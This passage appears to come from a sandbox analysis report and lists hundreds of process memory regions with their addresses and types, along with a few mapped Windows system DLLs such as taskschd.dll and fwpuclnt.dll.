1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2127 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2128 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2129 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2130 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2131 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2132 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2133 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2134 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2135 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2136 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2137 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2138 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2139 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2140 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2141 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2142 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2143 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2144 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2145 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2146 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2147 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2148 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2149 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2150 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2151 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2152 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2153 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2154 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2155 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2156 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2157 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2158 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2159 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2160 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2161 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2162 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2163 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2164 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2165 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2166 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2167 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2168 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2169 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2170 start_va = 0x7ffc5b440000 end_va = 0x7ffc5b473fff monitored = 0 entry_point = 0x7ffc5b45ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2171 start_va = 0x7ffc545d0000 end_va = 0x7ffc5466bfff monitored = 0 entry_point = 0x7ffc546296a0 region_type = mapped_file name = "efswrt.dll" filename = "\\Windows\\System32\\efswrt.dll" (normalized: "c:\\windows\\system32\\efswrt.dll") Region: id = 2172 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2173 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2174 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2175 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2176 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2177 start_va = 0x10de0000 end_va = 0x10e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010de0000" filename = "" Region: id = 2178 start_va = 0x7ffc58eb0000 end_va = 0x7ffc58f6efff monitored = 0 entry_point = 0x7ffc58ed1c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 2179 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2180 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2181 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2182 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2183 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2184 start_va = 0x7ffc58c20000 end_va = 0x7ffc58c55fff monitored = 0 entry_point = 0x7ffc58c30070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 2559 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2560 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2561 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2562 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2563 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2564 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 2565 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2566 start_va = 0x9a20000 end_va = 0x9f11fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a20000" filename = "" Region: id = 2567 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2568 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2569 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2570 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2571 start_va = 0x470000 end_va = 0x473fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 2572 start_va = 0x7ffc54160000 end_va = 0x7ffc54174fff monitored = 0 entry_point = 0x7ffc54162dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 2577 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2578 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2579 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2580 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2581 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2582 start_va = 0x7ffc54680000 end_va = 0x7ffc546e6fff monitored = 0 entry_point = 0x7ffc546863e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2583 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2584 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2585 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2586 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2587 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2588 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2589 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2590 start_va = 0x400000 end_va = 0x403fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 2591 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2592 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2593 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2594 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2595 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2596 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2597 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2598 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2599 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2600 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2601 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2602 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2603 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2604 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2605 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2606 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2607 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2608 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2609 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2610 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2611 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2612 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2613 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2614 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2615 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2616 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2617 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2618 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2619 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2620 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2621 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2622 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2623 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2624 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2625 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2626 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2627 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2628 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2629 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2630 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2631 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2632 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2633 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2634 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2635 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2636 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2637 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2638 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2639 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2640 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2641 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2642 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2643 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2644 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2645 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2646 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2647 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2648 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2649 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2650 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2651 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2652 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2653 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2654 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2655 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2656 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2657 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2658 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2659 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2660 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2661 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2662 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2663 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2664 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2665 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2666 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2667 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2668 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2669 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2670 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2671 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2672 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2673 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2674 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2675 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2676 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2677 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2678 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2679 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2680 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2681 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2682 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2683 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2684 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2685 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2686 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2687 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2688 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2689 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2690 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2691 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2692 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2693 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2694 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2695 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2696 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: 